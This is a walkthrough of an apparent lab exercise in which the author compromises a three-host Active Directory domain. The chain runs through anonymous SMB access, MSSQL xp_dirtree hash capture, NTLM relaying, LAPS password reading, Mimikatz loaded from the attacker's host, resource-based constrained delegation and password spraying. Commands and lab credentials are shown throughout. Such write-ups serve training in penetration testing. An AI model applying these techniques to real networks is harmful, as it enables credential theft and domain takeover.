Target Hosts
10.10.199.69 dc01.reflection.vl reflection.vl
10.10.199.70 ms01.reflection.vl
10.10.199.71 ws01.reflection.vlNmap Scan — DC01
Nmap scan report for 10.10.199.69
Host is up (0.19s latency).
Not shown: 987 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2023-08-24 13:47:28Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: reflection.vl0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
1433/tcp open ms-sql-s Microsoft SQL Server 2019 15.00.2000.00; RTM
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2023-08-24T13:46:14
|_Not valid after: 2053-08-24T13:46:14
|_ssl-date: 2023-08-24T13:48:49+00:00; -2s from scanner time.
|_ms-sql-info: ERROR: Script execution failed (use -d to debug)
|_ms-sql-ntlm-info: ERROR: Script execution failed (use -d to debug)
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: reflection.vl0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
3389/tcp open ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=dc01.reflection.vl
| Not valid before: 2023-06-06T16:19:23
|_Not valid after: 2023-12-06T16:19:23
|_ssl-date: 2023-08-24T13:48:49+00:00; -1s from scanner time.
| rdp-ntlm-info:
| Target_Name: REFLECTION
| NetBIOS_Domain_Name: REFLECTION
| NetBIOS_Computer_Name: DC01
| DNS_Domain_Name: reflection.vl
| DNS_Computer_Name: dc01.reflection.vl
| DNS_Tree_Name: reflection.vl
| Product_Version: 10.0.20348
|_ System_Time: 2023-08-24T13:48:09+00:00
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: -1s, deviation: 0s, median: -2s
| smb2-time:
| date: 2023-08-24T13:48:10
|_ start_date: N/A
| smb2-security-mode:
| 311:
|_ Message signing enabled but not requiredNmap Scan — MS01
Nmap scan report for 10.10.199.70
Host is up (0.18s latency).
Not shown: 996 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
445/tcp open microsoft-ds?
1433/tcp open ms-sql-s Microsoft SQL Server 2019 15.00.2000.00; RTM
|_ms-sql-ntlm-info: ERROR: Script execution failed (use -d to debug)
|_ms-sql-info: ERROR: Script execution failed (use -d to debug)
|_ssl-date: 2023-08-24T13:50:49+00:00; -2s from scanner time.
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2023-08-24T13:43:40
|_Not valid after: 2053-08-24T13:43:40
3389/tcp open ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=ms01.reflection.vl
| Not valid before: 2023-06-06T16:41:09
|_Not valid after: 2023-12-06T16:41:09
| rdp-ntlm-info:
| Target_Name: REFLECTION
| NetBIOS_Domain_Name: REFLECTION
| NetBIOS_Computer_Name: MS01
| DNS_Domain_Name: reflection.vl
| DNS_Computer_Name: ms01.reflection.vl
| DNS_Tree_Name: reflection.vl
| Product_Version: 10.0.20348
|_ System_Time: 2023-08-24T13:50:11+00:00
|_ssl-date: 2023-08-24T13:50:50+00:00; -2s from scanner time.
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: -1s, deviation: 0s, median: -2s
| smb2-time:
| date: 2023-08-24T13:50:14
|_ start_date: N/A
| smb2-security-mode:
| 311:
|_ Message signing enabled but not requiredNmap Scan — WS01
Nmap scan report for 10.10.199.71
Host is up (0.20s latency).
Not shown: 997 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
445/tcp open microsoft-ds?
3389/tcp open ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=ws01.reflection.vl
| Not valid before: 2023-06-06T16:42:13
|_Not valid after: 2023-12-06T16:42:13
|_ssl-date: 2023-08-24T13:52:37+00:00; -2s from scanner time.
| rdp-ntlm-info:
| Target_Name: REFLECTION
| NetBIOS_Domain_Name: REFLECTION
| NetBIOS_Computer_Name: WS01
| DNS_Domain_Name: reflection.vl
| DNS_Computer_Name: ws01.reflection.vl
| DNS_Tree_Name: reflection.vl
| Product_Version: 10.0.19041
|_ System_Time: 2023-08-24T13:51:57+00:00
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2023-08-24T13:52:03
|_ start_date: N/A
| smb2-security-mode:
| 311:
|_ Message signing enabled but not required
|_clock-skew: mean: -2s, deviation: 0s, median: -2sSMB Enumeration — MS01
We can list the SMB share using anonymous login.
smbclient -N -L //10.10.199.70/
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
staging Disk staging environment
SMB1 disabled -- no workgroup availableA config file, staging_db.conf is found in the staging share.
smbclient -no-pass //10.10.199.70/staging/
Password for [WORKGROUP\user]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Thu Jun 8 01:42:48 2023
.. D 0 Thu Jun 8 01:41:25 2023
staging_db.conf A 50 Thu Jun 8 19:21:49 2023
6261245 blocks of size 4096. 1760432 blocks availableThe config file contains credentials of web_staging account.
user=web_staging
password=Washroom510
db=staging MSSQL Enumeration — MS01
With the obtained credentials, we can check which MSSQL server we can login with the credentials.
We can then login to the MSSQL server using the imacket-mssqlclient.
In the staging database, there is a users table which contained some credentials. However, using those credentials to enumerate other services such as smb, winrm etc. don’t find anything userful. Apart from that, current user don’t have sa privileges necessary for elevating privileges or achieving code execution on the host.
UNC Path Injection — MS01
Since no other attack vectors are possible, we can try UNC path injection on the MSSQL server in order to steal the NTLMv2 hash of SQL service account. We can use the xp_dirtree procedure to force the SQL service account to connect to our SMB server. Therefore, we set up the SMB server, and execute the xp_dirtree procdure in the SQL.
Although we know have the NTLMv2 hash of the svc_web_staging service account, it doesn’t seem to be using a weak password that we can crack easily.
NTLMv2 Relaying to DC01
Since we can’t crack the hash, we can try relaying it to other hosts (DC01, and WS01). If the svc_web_staging user is a local administrator on the target host, we can gain code execution. However, NTLMv2 relaying against SMB is only possible if the target hosts have SMB signing disabled. We can use the crackmapexec to check the SMB signing status on the target hosts.
Fortunately, the SMB signing is not enabled on all hosts.
Impacket-ntlmrelayx can be used to relay the hash, and try gaining code execution on the target.
And we execute the previous xp_dirtree procedure on the MSSQL server again.
EXEC master..xp_dirtree "\\10.8.0.211\\test\"Once executed, we see that authenticating against the dc01 host using the svc_web_staging service account is successful. Howerver, we get rpc access denied error and code execution is not succeeded. This is because the svc_web_staging user isn’t a local administrator on the target host.
Despite the direct code execution isn’t successful, we can still try accessing the SMB shares on the dc01 host in the context of svc_web_staging user.
This time we use the -i flag instead in order to spawn an interactive SMB shell.
impacket-ntlmrelayx --no-http-server -smb2support -t dc01.reflection.vl -i
We can then access to the SMB shares on 127.0.0.1:11000.
Connect to the SMB shares, and there is another non-default share named prod.
In the share, there is a file seemed to be a config for production database.
And we get another credentials of web_prod user.
user=web_prod
password=Trib********
db=prod We can then enumerate again to see which MSSQL host web_prod can access to.
So now connect to the MSSQL server (DC01) host.
We again find another database, prod, along with its users.
Active Directory Enumeration
We can use one of the discovered credentials to run bloodhound-python ingestor.
bloodhound-python -u dorothy.rose@reflection.vl -p 'hC_fn*********' -dc dc01.reflection.vl -d reflection.vl -ns 10.10.154.181 -c all --zipIn the bloodhound, we see that abbie.smith has GenericAll rights to MS01 host. Which means we can abuse the Resource-based Constrained Delegation to gain code execution on the MS01.
In order to perform the RBCD attack, we will first need to create a computer account. By default, domain users can attach up to 10 computers to an Active Directory domain, which can be checked in the MS-DS-Machine-Account-Quota attribute. Crackmapexec has the module to check it.
However, we have 0 for the MachineAccountQuota, and we can’t add new computers. Therefore, RBCD attack isn’t possible at this point. So what can we do with the GenericAll rights then …? Basically we should be able to read/write all attributes on the MS01 host. Which means if the Local Administrator Password Solution (LAPS) is installed on the MS01 host, it will be stored in ms-Mcs-AdmPwd attribute. As we have GenericAll rights, we can read that attribute to extract the LAPS password. We can check if the LAPS is installed on MS01 in the bloodhound using a custom query. (I just changed the haslaps value to true)
{
"name": "Computers with LAPS",
"category": "Information Gathering",
"queryList": [
{
"final": false,
"title": "Select a Domain...",
"query": "MATCH (n:Domain) RETURN n.name ORDER BY n.name DESC"
},
{
"final": true,
"query": "MATCH p = (d:Domain {name: $result})-[r:Contains*1..]->(c:Computer {haslaps: true}) RETURN p"
}
]
},We can confirmed that the LAPS is indeed installed on the host.
Using the crackmapexec again, we can extract the LAPS password.
Then gain access to the MS01 host, and disable the Windows Defender.
And load the Invoke-Mimikatz.ps1 script into memory.
iex (iwr 10.8.0.211/Invoke-Mimikatz.ps1 -UseBasicParsing)Then we can check the Windows Credential Vault to see if any stored credentials exist.
Invoke-Mimikatz -Command '"token::elevate" "vault::cred /patch"'Another credentials of Georgia.Price is found in the vault. Which is used for a scheduler task.
RBCD Abuse (again …..?)
Going back to the bloodhound, we see that Georgia.Price has GenericAll rights on the WS01 host. Which again could be abused to carry out the RBCD attack. Unlike last scenario where we can’t create computer accounts and there was no computer account we had control over, we now have the MS01$ computer account, hence we can utilize it perform the attack.
We can leverage the impacket-secretsdump script to extract the computer account hash of the MS01 host.
Following this, we can first check the msDS-AllowedToActOnBehalfOfOtherIdentit attribute of the WS01 host using the impacket-rbcd script. The attribue is currently empty.
We can then append MS01$ to the attribute.
Once the attribute has been modifed, impacet-getST script can be used to generate impersonating service ticket. (Administrator is impersonated in this case)
After that we can export the generated ccache file.
We can finally gain code execution on the WS01 host using the impersonated Kerberos’ ticket.
Using the secretsdump script again, we can extract the hashes on the WS01 host, and find another credentials of Rhys.Garner.
Checking what permissions Rhys.Garner has in the bloodhound doesn’t show anything useful.
Since we now get another password, we can try spraying it to see if the password is reused by another user. To enumerate all AD users, we can use the GetADUsers script from impacket.
impacket-GetADUsers -all -dc-ip dc01.reflection.vl reflection.vl/abbie.smith:'CMe1*********'
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] Querying dc01.reflection.vl for information about domain.
Name Email PasswordLastSet LastLogon
-------------------- ------------------------------ ------------------- -------------------
Administrator 2023-06-08 00:14:01.041178 2023-08-27 21:37:25.291898
Guest <never> <never>
labadm 2023-06-08 00:14:08.010484 <never>
krbtgt 2023-06-08 00:19:21.946768 <never>
Georgia.Price 2023-06-08 01:31:20.923458 2023-08-27 21:36:17.749624
Michael.Wilkinson 2023-06-08 01:31:21.032613 <never>
Bethany.Wright 2023-06-08 01:31:21.095442 <never>
Craig.Williams 2023-06-08 01:31:21.188909 <never>
Abbie.Smith 2023-06-08 01:31:21.251507 <never>
Dorothy.Rose 2023-06-08 01:31:21.314143 <never>
Dylan.Marsh 2023-06-08 01:31:21.392881 <never>
Rhys.Garner 2023-06-08 01:31:21.449098 2023-06-08 20:01:27.028770
Jeremy.Marshall 2023-06-08 01:31:21.502186 <never>
Deborah.Collins 2023-06-08 01:31:21.553532 <never>
svc_web_prod 2023-06-08 01:47:59.981338 2023-08-27 21:23:07.194792
svc_web_staging 2023-06-08 01:48:26.340517 2023-06-08 19:17:15.948136
dom_rgarner 2023-06-08 03:25:40.067821 <never>The password is indeed being reused by another user, dom_rgarner, who is a domain admin.
Use the credentials to login to the DC01 host, and get the flag.
